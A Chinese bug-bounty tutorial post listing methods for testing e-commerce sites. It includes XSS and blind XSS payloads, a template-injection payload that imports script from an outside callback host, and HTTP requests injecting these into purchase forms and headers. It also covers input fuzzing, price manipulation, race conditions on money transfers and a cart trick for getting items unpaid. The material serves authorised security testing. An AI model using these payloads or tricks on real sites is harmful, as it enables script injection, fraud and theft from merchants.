查看原文
其他

漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-II

Richardo1o1 迪哥讲事 2023-07-11

漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-II

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

前言

本文为本系列的第二篇,前篇有:

漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I

正文

第八种方法

尝试在所有的字段中注入XSS有效载荷,比如: "><svg/onload=prompt(1)>或者Blind XSS 的有效载荷,比如: "><img src=//me.xss.ht>,尝试获取XSS

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type:application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1&price=10&currency=dollar&token=************ &add="><img src=//me.xss.ht>

第九种方法

尝试注入blind xss或者blind 模板注入的有效载荷,例如:(主要是 Angular或者 Vue.js)

在User-Agent中:{{constructor.constructor ('import("http://me.xss.ht")')()}}

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0"><img src=//me.xss.ht>
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

Quantity=1&price=10&currency=dollar&token=************& add=egy

第十种方法

尝试在所有的输入字段中插入以下:

0x00 ➡️0x2F
0x3A ➡️0x40
0x5B ➡️0x60
0x7B ➡️0xFF

比如: Quantity=%00 或者  Quantity=%FF可能会导致

  • 信息泄露
  • 绕过黑名单
  • 账户劫持
  • 内存崩溃

第十一种方法

尝试在参数的所有字段值中插入大的字符或数字,例如Quantity=XXX 50.000+ XXX,又例如abc.com/search/?q=<many character>

可能造成敏感信息泄露

第十二种方法

尝试操纵响应以引起错误

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.company.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length

{
"price" : 0.10 ,
"quantity" : 1 }

第十三种方法

如果有资金从银行账户1转到银行账户2,例如http://comapny.com/transfer?from=1&to=2&amount=10 ,尽量使用竞态条件

复现步骤:

  • 从账户1向账户2转账的时候,例如:http://comapny.com/transfer?from=1&to=2&amount=10
  • 拦截请求,将其转发给Turbo Intruder
  • 使用Race File作为Race Condition

第十四种方法

允许用户在支付物品时改变订单的应用程序,如果在过程结束时没有验证,也可能存在漏洞。

复现步骤:

  • 使用Firefox浏览器,添加物品到购物车,通过付款页面,然后在此停止
  • 使用Chrome,然后添加新的物品到购物车
  • 回到Firefox浏览器,完成支付流程,可能你会白嫖了一个物品


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存